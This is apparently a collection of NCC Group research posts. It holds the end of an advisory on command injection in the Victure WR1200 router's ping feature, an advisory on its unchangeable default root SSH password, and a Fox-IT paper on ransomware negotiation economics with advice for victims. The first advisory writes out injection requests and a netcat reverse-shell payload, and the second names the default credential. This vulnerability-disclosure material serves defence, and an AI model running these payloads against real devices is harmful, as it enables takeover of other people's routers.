The “ping/traceroute” feature found under the Advanced/System Management portion of the web interface asks the user to enter an IP address to then perform a ping against that IP. By appending a semicolon ; to the domain field of the request, the attacker can successfully inject a command to be executed by the device.

e.g.:

request:

POST /cgi-bin/luci/;stok=REDACTED/admin/opsw/ping_tracert_apply HTTP/1.1
Host: 192.168.16.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 74
Origin: http://192.168.16.1
Connection: close
Referer: http://192.168.16.1/cgi-bin/luci/;stok=REDACTED/admin/opsw/advanced.html
Cookie: sysauth=REDACTED

{"type":"setmonitor","kind":"ping","domain":"127.0.0.1; echo vulnerable"}

response:

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Cache-Control: no-cache
Expires: 0
Content-Length: 25

{"result":0, "msg":"..."}

The attacker can then attempt retrieving the result of the last command executed by using the following request.

request:

GET /cgi-bin/luci/;stok=REDACTED/admin/opsw/ping_tracert HTTP/1.1
Host: 192.168.16.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://192.168.16.1/cgi-bin/luci/;stok=REDACTED/admin/opsw/advanced.html
Cookie: sysauth=REDACTED

response:

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Cache-Control: no-cache
Expires: 0
Content-Length: 45

{ "info": "vulnerable -c 4", "finish": 0 }

The following payload fed into the domain field can be used to open a reverse shell on any reacheable host on the WAN or LAN network.

127.0.0.1 -c 1 ;rm /a;mkfifo /a;cat /tmp/a|/bin/sh -i 2>&1|nc X.X.X.X 1111 >/a;echo reverse_shell

Replace X.X.X.X in the above command by the IP address of an host waiting for an incoming connection. On the receiving host, apply an adequate firewall rule allowing incoming traffic on port 1111 and issue the following command to wait for the incoming connection from the router:

netcat -l -p 1111

Recommendation

This issue will remain exploitable to authenticated users as long as the Vendor doesn’t fix it through a new router firmware update.

Root SSH Access Enabled with Default Password on Victure WR1200 WiFi Router (CVE-2021-43284)

Vendor: Victure
Vendor URL: https://www.govicture.com
Versions affected: All versions up to and including 1.0.3
Systems Affected: WR1200
Author: Nicolas Bidron
CVE Identifier: CVE-2021-43284
Severity: High 8.8 (CVSS v3.1 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Summary

Victure’s WR1200 WiFi router is a general consumer WiFi router with an integrated web interface for configuration. It was found that the device offers SSH access on the local network which for some of the accounts uses default password that are not changeable through the web interface.

Impact

An attacker with access to the local network can gain access with elevated privileges on the device through SSH even in cases where the admin password was successfully updated through the web interface.

Details

The device allows SSH access from its Local Network (WiFi and ethernet) for 2 distincts users: admin, root. The admin’s SSH password matches the password set for the admin user on the web interface. The root’s SSH password never gets updated from its default value of “admin”. This leaves an attacker able to gain control of the device through SSH whether the admin password was changed on the web interface or not.

Recommendation

Ensure the admin’s default password is changed through the web interface. Also change the root account default password by logging in as root on the router through SSH in the following manner:

ssh [email protected]
>passwd

Disclosure Timeline:

January 26th 2021: Initial email form NCC to Victure announcing to vendor vulnerabilities were found in one of their device.

January 27th - February 2nd 2021: multiple emails between Victure and NCC to agree on a secure method to deliver the vulnerabilities write-ups to Victure.

February 2nd 2021: Write-ups transmitted to Victure's representative through a verified Whatsapp chat session. Victure's representative then initiated a conversation between the software maintainer and NCC through Skype

Februrary 3rd 2021: the software maintainer on Skype acknowledged receipts of the bugs write-ups.

October 12th 2021: NCC reached out to Victure again (not having heard from them since Februrary 3rd 2021) to inform of intent to publicly disclose the bugs unless they can confirm they have a planned fix release within the next 30 days.

As of publishing date of this Technical Advisory, no further communication from Victure was received since Februray 3rd 2021.

Thanks to

Jennifer Fernick and Aaron Haymore for their support throughout the research and disclosure process.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  11/12/2021
Written by: Nicolas Bidron

✇ NCC Group Research

“We wait, because we know you.” Inside the ransomware negotiation economics.

By: Aaron Haymore

Pepijn Hack, Cybersecurity Analyst, Fox-IT, part of NCC Group

Zong-Yu Wu, Threat Analyst, Fox-IT, part of NCC Group

Abstract

Organizations worldwide continue to face waves of digital extortion in the form of targeted ransomware. Digital extortion is now classified as the most prominent form of cybercrime and the most devastating and pervasive threat to functioning IT environments. Currently, research on targeted ransomware activity primarily looks at how these attacks are carried out from a technical perspective. However, little research has focused on the economics behind digital extortions and digital extortion negotiation strategies using empirical methods. This research paper explores three main topics. First, can we explain how adversaries use economic models to maximize their profits? Second, what does this tell us about the position of the victim during the negotiation phase? And third, what strategies can ransomware victims leverage to even the playing field? To answer these questions, over seven hundred attacker-victim negotiations, between 2019 and 2020, were collected and bundled into a dataset. This dataset was subsequently analysed using both quantitative and qualitative methods. Analysis of the final ransom agreement reveals that adversaries already know how much victims will  end up paying, before the negotiations have even started. Each ransomware gang has created their own negotiation and pricing strategies meant to maximize their profits. We provide multiple (counter-)strategies which can be used by the victims to obtain a more favourable outcome. These strategies are developed from negotiation failures and successes derived from the cases we have analysed, and are accompanied by examples and quotes from actual conversations between ransomware gangs and their victims. When a ransomware attack hits a company, they find themselves in the middle of an unknown situation. One thing that makes those more manageable is to have as much information as possible. We aim to provide victims with some practical tips they can use when they find themselves in the middle of that crisis.

Introduction

It is 1:30 on a Saturday morning. You just went to bed exhausted after a week of demanding work, but your phone is ringing, nudging you to wake up. It is your IT department on the line telling you to come to the office right now. Your company got hacked and all off the important data is encrypted, including the backup storage. The head of your IT department informs you it is a kind of virus called ransomware. After two long hours of phone calls, you have assembled a crisis management team and you open the ransom note. It  redirects you to a TOR website  where you can chat with the adversaries who hacked your company. Their demand is 3.5 million US dollars in cryptocurrency. You get a sinking feeling in your stomach. You have spent years building this company from the ground. You hired all employees yourself, and know every single one of them by name. You start to realise that the weekend you planned away with your wife and kids is going to have to be cancelled. You need to be there now for your company. For all the families of the people that work for you. You open the chat and start typing. But after telling them you need more time to even start thinking about making a payment, all they respond with is – “We wait.”

After the adversary encrypts and exfiltrates the selected data, he sets an initial ransom demand. If the victim decides to engage in negotiation, both sides will try to reach an agreement on the final amount. With this research we wanted to investigate the phenomenon of ransomware negotiations. How do adversaries set the price of their ransom demand? What could be the final price adversaries would accept? How does the difference in information about each other impact the negotiation process? What does this tell us about paying or not paying the ransom? If companies do end up paying, are there strategies that the companies can utilize to lower the ransom demand? 

We made use of both quantitative as well as qualitative research methods to answer these research questions. There have been some earlier reports and blog posts from security companies or news agencies on this topic. However, this research  is mainly based on empirical approaches. We have used our own data, gathered from more than seven hundred negotiations between threat actors and victims. Using this data, we provide information and practical tips to victims who need it the most.

There is a negative sentiment in our society towards paying or negotiating with criminals, and the legitimacy and ethics of it are also questionable to say the least. Nonetheless, we realise that a significant percentage of companies currently do end up paying the ransom demand. Our research demonstrates that the adversaries have a significant upper hand in the negotiation process They often know how much a victim would pay in the end, providing them a comfortable vantage point in the negotiations. We hope to achieve the following twofold goal with our research: firstly, we discourage the victims from engaging with the adversary. However, should there be no choice to negotiate, the second half of our paper provides tips on how to do so successfully.

The paper is structured in the following order. First, we start  with modelling how adversaries are able to use price discrimination to maximize their profit. Then, we use our data to support our hypothesis on the information asymmetry during negotiation. In the second part of the paper, we dig deeper into the negotiation process. We give some practical tips and look at strategies that can be used during the negotiation phase. In the final paragraphs we summarize our findings and look ahead to the future on how we should deal with ransomware not just as individuals but as a society.

The paper is structured in two parts. The first half starts with providing a short background in how ransomware as a service developed and its economy, and goes on modelling how adversaries are able to use price discrimination to maximize the profit. We transition into illustrating the information asymmetry between the victims of the ransomware attack and the attackers themselves using our datasets. The second half digs deeper into the negotiation process, and provides practical tips and strategies that can be used during the negotiation phase, should it prove to be unavoidable. In the final paragraphs, we summarize our findings and explore the future possibilities of how to deal with the phenomenon of ransomware, not only as individuals under attack, but as society as a whole.

Background

The idea of the cryptovirology, using cryptography to write malicious software, was initially born out scientific curiosity within an academic research paper in 1996 [1]. After more than a decade, it was the actors behind GameOverZeus/ZeusP2P who brought the business into the wild under the name of CryptoLocker in 2013 [2]. CryptoLocker implemented the hybrid cryptographic system, which was the same as the cryptovirology, to encrypt personal files and demand a ransom for the key to decrypt them.  Consequently, the idea of abusing the cryptography, which was initially intended to provide privacy, has attracted attention from different cybercrime actors. For instances, in 2017, the WannaCry ransomware had the capability to be self-propagated using the EternalBlue exploit and aimed to infect every vulnerable computer on the internet [3]. SamSam ransomware occupied the news headlines as it was targeting health-care sectors in 2017 [4]. More recently, the arrival of Ransomware-as-a-Service (RaaS) provides different cybercrime actors an easy access to ready-to-use ransomware. Along with the popularity of cryptocurrency, it led to a surge of targeted ransomware attacks worldwide. The ecosystem has since been developed into a multiple-extortions attack. Sensitive data is located, exfiltrated and encrypted. Ransomware extortions nowadays not only impose a denial-of-service attack on the critical business resources, but also invade the privacy of their victims. Similarly, we have seen a rise in the ransom demands . Previously people had to pay a couple hundred dollars to get their holiday pictures back. Nowadays we see companies getting extorted for millions of dollars, many of which end up paying these prices.

Data Collection

In this research, we primarily focused on two different ransomware strains. The first dataset was collected in 2019. This was a period in time when targeted ransomware attacks were upcoming and only a handful of groups were engaged in this business model. At that time, the adversaries were relatively inexperienced and ransom demands were lower compared to today’s ransom amounts. The second dataset was collected in the late 2020s and through the first couple of months in 2021. At this time, ransomware attacks have become a major threat to companies worldwide. Not only has the maturity of the operation been improved, but there has also been an underground market shift to targeting big and profitable enterprises. The owners of the second ransomware strain specifically positioned themselves in the market to only target big and profitable enterprises. The first dataset consists of 681 negotiations, and the second dataset consists of 30 negotiations between the victim and the ransomware group. Due to the sensitive nature of our data, we cannot share further details as we have an obligation to protect our sources.

Ransomware Economics

As most adversaries have claimed, ransomware attacks are nothing but business. Ransomware groups try to achieve the highest possible profits. That is their primary motivation. In this section, we try to model the factors on how the adversaries make decision for profit making. The model is  somewhat rudimentary, but can be used to explain key factors which impact the decision making of the adversaries and as well as their victims.

Hernandez-Castro, et al. [5] explain their hypothesis in their paper “Economic Analysis of Ransomware” and used small scale surveys to get some preliminary results. Based on their model, which we have updated, our research goes beyond this and tests our hypothesis based on actual ransomware negotiation cases.

First and the most importantly, the total profit is not only influenced by the amount of ransom they demand from the victim. It also depends on  whether the victim decides to pay, and the costs of the operation. Instead of studying a single ransom gain, the total profit throughout a series of attacks should be taken into consideration. Take two examples, an organised cybercrime group which only hunts for big targets and asked for millions of dollars but only 5% of the victims paid. We compare this with another group which only asks for ten thousand dollars but 20% of the victims paid. Evidently, these two business strategies lead to different profit gains. Furthermore, the cost for operating a  criminal operation should be included in the calculation. We use the following formula to calculate the overall profit from adversary’s perspective. 

We describe P as the total profit taken by the criminal from N number of victims.

  •  ri is the final ransomware demand on case .
  •  li is the percentage left after exchanging the cryptocurrency to “clean” currencies. 
  •  mi is the percentage left after paying the commission fee for the RaaS platform. This fee depends on the rules of the RaaS platform and the total ransom. It could cost from 10 to 30 percentage of the . In some cases, this commission fee is 0 as some adversaries use in-house ransomware tool kits.
  • f (i) is the final decision made by the victim on to pay or not.  can either be 0 or 1, with 0 meaning the victim decided not to pay and 1 meaning the victim did pay. 
  • ci is the cost of carrying out the attack. The detailed explanation can be found in the following paragraph.

Using this formula, we can calculate the adversaries’ profit for N number of victims. Let us assume we have two victims. Therefore, , the ransom demand is $100,000 in bitcoin in both cases (ri) , the exchange cost is 10% (li = 90%), the RaaS fee is 20% (li = 80%) of the ransom. Only the second victim pays, and the cost of carrying out the attack is $50 (ci) . 

In the first case the profit is ($100,000 * 0.8 * 0.9) * 0 – $50 = -$50. In the second case the profit is ($100,000 * 0.8 * 0.9) * 1 – $50 = $71,950. The total profit of the ransom attack is $71,950 + (-$50) = $71,900.

In reality, each variable in the equation will be larger than the example we have used. However, as you can tell, when an adversary is able to find a sweet spot where profit can be maximized, it can be an incredibly profitable business. On the other hands, if less and less victims decide to pay or the ransom paid was less than the adversaries had expected, it becomes a challenge to keep their business running.

The variables affecting the cost of carrying out the attack (ci) can include:

  • Risk cost: These are the costs of avoiding being held accountable. It might include setting up proxies, hiding human factor evidence and even bribing local authorities.
  • Penetration cost: It is the cost of accessing the targets’ network. It might include, for example, hiring skilled hackers, buying access to malwares/exploits/distribution services and any other form of illegal access into the targets’ network. If the adversary uses a home brew crypto locker, the cost should be included as well

As for the f (i), it is a function which models the decision of paying ransomware or not. Even though in the end it is a binary decision, being either a yes or a no, the major variables affecting this decision can include:

  • Ethics: There are certain companies who do not cooperate with the adversary whatsoever.
  • ri : The ransom amount strongly impacts the decision whether or not to pay.
  • Remediation cost:  These are the cost of restoring backups, restarting any services, and compensating affected customers.
  • Regulation cost: These are the estimated cost of paying the fine for the data breach (like GDPR-fines).

Maximise the Profit – Finding Pricing Strategy from the Final Ransom Deal.

In the earlier years, groups behind ransomware strains used a uniform pricing strategy, which meant they asked a fixed price after each infection. For example, CryptoLocker demanded a payment of 400 USD or EUR per victim. However, the ecosystem has evolved into multiple extortions with each their own different price discrimination approach. There are three types of classic price discriminations [6]. First-degree Price Discrimination (Personalized Pricing), it is a perfect price discrimination where each consumer gets charged a different price based on their own willingness and ability to pay. Second-degree is, for example, when the buyer gets a discount for bulk purchases. Third-degree Price Discrimination happens when the price depends on personal traits of the consumer such as age, gender etc. In the case of a ransomware attack this could be the size of the company or the number of servers encrypted.

We have seen different actors adapting second and third degree of price discriminations on ransom pricing. A Chinese cybercrime group was asking for a relatively high initial price for decrypting less than 10 locked computers, and the price gliding down a slope after a bulk number of decryptor was sold. This is an example of second-degree of price discrimination.

NUMBER OF COMPUTERS PRICE/COMPUTER (IN USD)
1-9 3000
10-49 1500
50-99 1120
100-499 750
500-999 560
1000-4999 380
5000-9999 260
Table 1. The price table provided by the Chinese actors behind a ransomware attack.

On the other hand, based on our data, two groups we looked at were a part of multiple extortion ransomware gangs. They were both using third-degree price discrimination. In our dataset D-first, 17% (N = 116) of the 681 victims group proceeded to pay the ransom, with an average amount of $400,767.05 per victim. Within the total of 116 victims who  paid, the revenue of 32 companies was known by us.

In the above example, the initial ransom price was set according to multiple variables. Finding out how the initial price is set and what it represents is important. However, this is beyond the scope of our research because it is rather difficult to get access to these decision-making processes only residing within a criminal organisation. Thus, we focused on studying only the final ransom deal, which may tell a more accurate story on how the hidden price, or maybe a baseline, is set.

A negotiation starts with an adversary demanding an initial ransom. Then, the victim has the option to ask for a lower price, or what adversaries call a ‘discount’. Both sides offer their ideal price back-and-forth. Intuitively, one would assume that the adversary did not know how much a victim was willing to pay. However, we used a metric: Ransom per annual Revenue (in Million USD)  to demonstrate that the result could  differ from  what our intuition is telling us / what is initially assumed. This ratio tells us how much the victim paid per every million dollars in revenue. To calculate the RoR (Ransom per annual Revenue), we divided the ransomware demand by the annual revenue a company made in the last year before they got attacked.

REVENUE (MILLION USD) RANSOM PAID ROR TYPE
$100 $36,270 363 MID
$151 $59,177 392 MID
$401 $405,068 1010 MID
$60 $63,867 1064 SMALL
$12 $12,788 1066 SMALL
$41 $57,274 1397 SMALL
$27 $39,300 1456 SMALL
$1,850 $3,126,549 1690 MID
$488 $1,015,554 2081 MID
$418 $957,906 2292 MID
$501 $1,229,124 2453 MID
$17 $48,191 2835 SMALL
$49 $158,798 3241 SMALL
$273 $1,049,651 3851 MID
$18 $80,297 4461 SMALL
$49 $290,483 5928 SMALL
$56 $385,141 6878 SMALL
$117 $918,027 7846 MID
$15 $118,871 7925 SMALL
$127 $1,055,674 8312 MID
$7 $66,917 9560 SMALL
$14 $161,614 11544 SMALL
$18 $216,162 12009 SMALL
$7 $87,422 12489 SMALL
$56 $728,014 13000 SMALL
$11 $147,628 13421 SMALL
$5 $68,308 13662 SMALL
$11 $156,541 14231 SMALL
$10 $151,038 15104 SMALL
$21 $371,562 17693 SMALL
$7 $368,576 52654 SMALL
$3 $234,770 78257 SMALL
Table 2. The Revenue, ransom and RoR calculated.
Figure 1. The box plot of RoR on all of the data in first dataset.

Interestingly, most of the final negotiated ransom prices fell into a certain margin, but there are also some outliers. We can further divide the victim companies into two categories based on their estimated revenue. D-first-small and D-first-mid represent small (revenue < 100 million USD per year) and medium size (revenue >= 100 million USD per year) companies, respectively.

Data Set Revenue Number Quartile Medium Third Quartile
D-first-mid >= 100 million $ 10 1,000 2,200 3,900
D-first-small < 100 million $ 21 3,200 10,550 13,700
Figure 2. The box plot of RoR on the first dataset with two revenue groups separated. The left plot shows the victims who have more than 100 million in annual revenue and the right-hand side plot shows the victims who earned less than 100 million in annual revenue in the year before the company got compromised.

The results show that the adversaries operating behind the dataset we collected knew how much ransom a victim is willing to pay before the negotiation had started.

Another interesting observation is that smaller companies generally pay more from a RoR point of view. In other words, a smaller company pays less in absolute amount but higher in percentage of their revenue. This observation still follows in the second dataset.

Ransom Paid Estimated Revenue (in Million USD) RoR
$14,400,000 $17,500 822
$1,500,000 $1,000 1,500
$500,000 $1,000 500
$350,000 $16 21,875
Table 3. The RoR calculation on the second data set.

The highest amount of ransom payment within the data set was 14 million. This was one case from the second dataset where the ransom was paid by a Fortune 500 company was found to be only $822 per every million in revenue, or 0.00822% of the annual revenue. The medium ransom of the small enterprises of the first dataset was found to be 0.22%.

The duration of participating in criminal activities affects the Risk Cost significantly. It is therefore understandable that a financially motivated actor could cherry pick valuable targets and profit from just a few big ransoms instead of attacking small companies. This situation leads to a few ransomware groups indeed deciding to only target big and profitable enterprises. In the second dataset (D-second), around 14% (N = 15) of 105 victims paid, with an average amount of $ 2,392,661 per victim. The owners of this second RaaS platform received less commission if the actor receives a higher amount of ransom. Therefore, there is an incentive for actors using the second RaaS platform to target high profile companies.

Maximise the Profit – Discussion

We realise that there are limitations on doing this research. We cannot say for certain that the identified victims set is representative for the entire population. Furthermore, based on our qualitative research we know that ransomware groups also use other factors to determine the price, such as the number of computers and servers that are encrypted, the number of employees or the expected amount of media exposure a company will receive if people find out they got compromised. Unfortunately, these factors are not all open-source and are therefore more difficult to compare. Although our dataset shows that the final ransom price has a correlation with the victim’s revenue, it cannot fully explain how adversaries set the ransom demands.

Despite these limitations, our findings suggests that adversaries have already adopted some price discrimination strategies. It is obvious that the attackers are optimizing their profit by trial and error in real infection cases. In addition, we have observed that some adversaries steal sensitive data and broadly look at financial statements from their victims. However, this pricing strategy, which is influenced by both successful negotiations and no deal situations, is unknown to the victims. Normally, in a negotiation, each player holds their cards in their own hands. The ransomware actor knows the cost of their business and how much they need to make to break even. Meanwhile, the victim makes an estimation of the remediation cost. The ransom price is the place where the two counterparts meet in the middle. In the cybercrime world, however, this is not the case. The victim is asked to play the game for the first time whereas the adversary has played many games to decide an optimal strategy. Furthermore, in sharp contrast to normal negotiations, the adversary can investigate the opponents’ cards if he chooses to do so. This results in a situation of a compromised victim trying to negotiate with an adversary that  runs an unfair negotiation game which guides the victim into a pre-set but reasonable ransom range without the victim’s knowledge. It is a rigged game. If the adversary plays well, he will always win. This conclusion ultimately contributes to a rampant ransomware ecosystem.

Do we negotiate with criminals?

Even though we have painted a bleak picture in our previous analysis, not all hope is lost. Despite their best efforts, the adversaries attacking companies are also just humans, and humans make mistakes or  can be influenced into making certain decisions. In the next two sections we will try to explain what options are left when the decision to negotiate is made .

Process-based tips before the negotiation starts

Although the focus of our research was the negotiation phase of a ransomware attack, we also wanted to provide some guidelines and tips on what to do before the negotiations start. We will not go into all things related to crisis management strategies, as there already is an abundance of trainings and information on the topic provided online and in print . We will, however, touch upon some topics that we feel are not always covered in other sources which we learned from reading the negotiations between ransomware groups and victims.

1.    Preparing employees

The first thing any company should teach their employees is not to open the ransom note and click on the link inside it. In the D-second database, and we have seen this at other adversaries as well, the timer starts to count when you click on the link. You can give yourself some valuable time by not doing this. Use this time to assess the impact of the ransomware infection. Address this in a structured manner by asking the following questions: Which parts of your infrastructure are hit? What kind of consequences does this have for your day-to-day operation? How much money are we talking about? This will allow you to retake a degree of control over the situation by mapping the future strategy better. 

2.    Think about your goals

Secondly, before you start negotiating, you should discuss your goal. What is it that you want to achieve? Is your technical department (perhaps with some outside help) able to restore the backups and do you need to extend the timer, or are you going for a lower ransom? It is also important to decide what ransom demand would be your best- and worst-case scenarios. You will only learn the actual demand when you click on the link, but you should at least make an estimation of what you could pay before you open a conversation with the adversary. 

3.    Communication lines

Another important thing to think about is to set up internal and external communication lines. Who is going to be responsible for what? A ransomware attack is not just an IT issue. Involve your crisis management team and you board to answer strategic questions. Involve legal counsel who can help answering the questions about possible cyber insurance coverage, and will know about rules and regulations regarding any institutions that need to be informed about data breaches. Also do not forget your communications department. It is getting more common for adversaries to inform the media that they have hacked a company. This is done to put extra stress and pressure on the company’s decision making. Realising this beforehand and having a media strategy prepared will help taking control of the situation, and mitigate possible damages.

4.    Inform yourself

Lastly, we advise to get informed about your attacker. Do some research yourself about their capabilities or hire a specialised company with a threat intelligence department. They can tell you more about the peculiarities of the adversary you are dealing with. Perhaps they have a decryptor which is not available online or know of another company who might be of help. They can also tell you more about the reliability of the adversary you are dealing with. Furthermore, knowing if you should expect a DDOS attack, calls to your customers, or the leakage of information to the press will be useful information to incorporate into your crisis management strategy.

Negotiation strategies

If the decision to pay the ransom is made , there are still ways to lessen the damage. Based the analysis of more than 700 cases we can give the following advice. Note that using just one of these strategies in your negotiation will not help as much but trying to implement as many of these as possible could save companies millions of dollars.

1.    Be respectful

This first tip might sound obvious, but crises can be emotional rollercoasters. Owners of companies can see their lives work vanish in front of their eyes, like seeing your house burn to the ground. We have seen multiple examples of companies getting frustrated and angry in conversations with threat actors resulting in chats being closed. Look at the ransomware crisis as a business transaction. Hire outside help if needed but stay professional. From the study of D-first database we learned that there is a negative relation between being kind and the amount of ransom paid in the end. One example of someone who went above and beyond during a negotiation is the following. This person managed to talk the ransom down from 4 million to 1.5 million dollars.

“Thanks Sir. We can pay 750,000 USD in XMR, provided that you will share with me the exact scope, volume, and significance of data that is in your possession. (…) I do stress the data, rather than the decryption key, since I learned about your very positive reputation in providing decryption keys. Looking forward hearing your thoughts. Respectfully, {victim’s name}.”

This example shows that not only should you see the negotiation as a business transaction, but it is also best to leave your emotions outside of the conversation.

2.    Do not be afraid to ask for more time.

Adversary will usually try to pressure you into making quick decisions. This is often done by threatening to leak documents after a certain amount of time or by threatening to double the ransom. The more stress the adversary can impose on you, the worse your decision making will be. However, in almost all D-second cases the adversary was willing to extend the timer when negotiations were still ongoing. This can be helpful for several reasons. In the beginning of the process, you will need time to assess the situation and rule out any possibilities of restoring your data. Similarly, it can give you extra time to produce different strategies. If you decide to pay in the end, you will need to make arrangements to acquire the right cryptocurrency.

Figure 3. A screenshot of a notification showing the ransom demand has been doubled because the timer has run out.

We have seen examples of cases in which the negotiation went on multiple weeks after the deadline. In this case the deadline was already over for two days:

Hello, I’m going to be as up front and honest as I can be right now and let you know that we have not been able to secure the 12 million dollars and we also have just now been able to download the data that you took so that we can review it. If at all possible, we need some more time to get together what we can get together to, at the very least, make a reasonable offer. Coming up with the 12 million is almost impossible but if it doubles, there’s no way we will be able to come up with the money. Just a few more days and we should be in a position to give you a realistic and reasonable offer. Any help would be greatly appreciated!

After being asked how much time they needed, the victim responded that they would need at least another week. The adversary agreed with this if they guaranteed a payment of 1 million within 24 hours otherwise the price would be doubled to 24 million. The victim responded to this by saying:

“I understand that and trust me, we are really trying here. This is exactly why I asked for more time. We have been working all night to gather just the funds to buy more time and we aren’t there. 1 million isn’t going to be possible right now 12 million is definitely going to take more time than 1 million and 24 million just isn’t possible at all really. This is the situation we are in right now. All we’ve asked for is more time and you are going to pass up on a potentially big payday over just giving us a few more days? How much effort would it take on your part just to give us a little more time? You’ve already taken our data and crippled our business. What more effort do you have to put forth to just work with us and give us a few more days. I’ve told you multiple times that we are trying like hell to get this money together from the moment you locked us down. Give us the time and we’ll get whatever we can get together and we’ll continue to communicate with you or don’t give us the time and get nothing. We’ll recover from this or we won’t and you will have put a bunch of people out of work that have been here for their entire careers. This is our livelihoods, this is how we feed our families, this is how we pay our bills. Please try and keep that in mind.

In the end they ended up paying 1.5 million dollars in cryptocurrency. Another way  to get more time is by explaining that higher-ups need more time to make decisions, or that you need more time to buy crypto:

“Not to mention it’s the weekend here and the banks or crypto buying sites aren’t open to get anything converted. Your timer runs out tomorrow. Just give us a few more days. We are trying here but we need a little help from you.”

3.    Promise to pay a small amount now or a larger amount later.

Whereas stalling for time can be an effective strategy if you want to prevent your data getting leaked while rebuilding your systems,  the following strategy can help  negotiating to settle on a smaller amount. Adversaries also have an incentive to close a deal quickly and move on to their next target. In multiple cases we have seen that the adversary in the D-second database gave large discounts when presented the option of getting a small amount of money now instead of a large amount of money later. In one case the adversary said the following after an initial demand of 1 million US dollars:

“I spoke to my boss and explained your situation to him. He approved a payment of 350k dollars. There will be no more discounts. Now you are offering 300k dollars, raise your price by 50k and we will close this deal now.”

4.    Convince the adversary you cannot pay the high ransom amount.

One of the most effective strategies is to convince the adversary your financial position does not let you pay the ransom amount that is initially asked. In one example a company was asked to pay 2 million and responded the following:

“We have discussed this with our management team. We do want the decryptor for our network and for our data to be deleted, but you have asked for a lot of money especially at the end of a difficult year. Can you offer us a lower price?

They got a 50K discount and ended up paying 1.95 million. Although this seems like a good deal, there are cases in which much less has been paid after a more drawn-out negotiation in which the victim was not as willing to pay. Two examples of this are two companies who both had to pay 1 million, but one ended up paying 350K and the other only 150K. There is also an example of a victim who talked down the price from 12 million to 1.5 million.

These companies achieved this by constantly stressing they could not pay the amount that was asked. One example of this is:

“Our overall revenue has suffered significant impacts in the past year and we are still losing more and more money by the day. Your demand of 12 million dollars is a large portion of our entire revenue for all of last year. You may not know anything about us as a company but we provide a vital service for our clients and this incident has affected not only our business but also many many people and other businesses that rely on us and our services. With all of that being said, we are still willing to pay something to get our data unlocked and not have our client’s information out on the internet for everyone to see. What we can offer you is 1,000,000 USD in bitcoin today to be done with this”.

Later they said:

“(…) With that being said, this payment is out of our own pockets and the million dollars is what we had. We’ve been in discussions all day with our team and we are willing to up our offer to 1,200,000 USD. Work with us here, we are paying for this out of pocket.”

“We’ve looked everywhere and tapped every resource we can tap and taken out every loan we can take out and we’ve been able to come up with another 150k to bring our offer to 1,350,000 USD.”

“We are doing the absolute best we can. With that being said, the owner of the company has agreed to take 50k out of his own pocket to further increase our offer to 1,400,000 USD. That is a hell of a lot of money for anyone and especially us. This is not only affecting our company, it’s affecting PEOPLE real, honest, and hard working people. Basically where we are at right now is that you can take this 1.4 million dollars to make sure that our data doesn’t get released or release the data and it’s worthless from a payment standpoint. There will be no reason at all for us to pay for anything to you once that’s done. We’ll focus our efforts on rebuilding our reputation and rebuilding our business. Please think about the two options here. Thank you for your consideration.”

After this the adversary agreed to the amount of 1.5 million which the victim ended up paying.

Now you might ask yourself, I understand this technique might work for companies who do not have that much money, but what about bigger companies with an obviously larger budget at their disposal? Does the adversary not have access to the financial statements of companies when they get hacked? One of the D-second victims was a Fortune 500 company who got this as a response from the adversary when telling them that they could only pay 2.25 million at max:

“Thank you for your offer but we have a counteroffer. Let me do some pretty important points. The first you are one of Fortune 500 companies with a revenue 16-18 billion, am I right? You produce kind of very important product right now (…) and because online business is booming right now. Back to the numbers we had encrypted 5,000-6,000 of your servers (…). So, if we do same VERY simple calculation. Your expenditures like, let say I don’t know $50 per hour or may me you are even more generous like $65? So, 24 hours spent to restore one server multiply per one encrypted by us server, this is like 10 million dollars in expenditure only on a labour, but don’t forget you spent all this time for installation and OOPS you can’t even restore any data because this is gone for next 1000 year of intensive calculations. The timer it ticking and in in next 8 hours your price tag will go up to 60 million. So, you this are your options first take our generous offer and pay to us $28,750 million US or invest some monies in quantum computing to expedite a decryption process.”

As you can see the adversary is not very willing to compromise. However, it seems they did not do a deep dive into the financial records of this company. They primarily talk about the servers they hacked. We speculate this might be because the ability to hack companies, and the ability to read and dissect complex financial statements might not have as much overlap. Even if they have access to those files, there is a difference between having a certain amount of revenue and having a couple million dollars in crypto laying around just for the occasion. In this example the company ended up paying 14.4 million instead of the 28.75 million which was asked initially.

5.    If possible, do not tell anyone you have cyber insurance

Our last negotiation strategy is that you must not mention to the adversary you have cyber insurance and preferably also do not save any documents related to it on any reachable servers. These are two examples of messages from chats in which the adversary knew the victim had insurance:

“Yes, we can prove you can pay 3M. Contact your insurance company, you paid them money at the beginning of the year and this is their problem. You have protection against cyber extortion. (…) I know that you are now in trouble with profit. We would never ask for such an amount if you did not have insurance.”

“Look, we know about your cyber insurance. Let’s save a lot of time together? You will now offer 3M, and we will agree. I want you to understand, we will not give you a discount below the amount of your insurance. Never. If you want to resolve this situation now, this is a real chance.”

Although a company could still tell the adversary that the insurance company is not willing to pay, this limits the options for any negotiation severely.

Some practical tips during the negotiation

Besides the process-based strategies before and during the negotiation, we also wanted to give a few tips that should be done regardless of your strategy:

  1. The first thing any company should do is try to set up a different means of communication with the adversary and if they do not want to switch, they should realise their communication is not private. Getting access to these chats is not the most demanding thing for technically skilled people. It happened multiple times that during a negotiation a chat got infiltrated by third parties who started interfering and disturbing the negotiation.
  2. Always asks for a test file to be decrypted. Although most infamous adversaries have a decent reputation nowadays, you can never be too sure.
  3. Make sure to ask for a proof of deletion of the files if you ended up paying. There are examples of companies who paid, but their files are still openly accessible online.
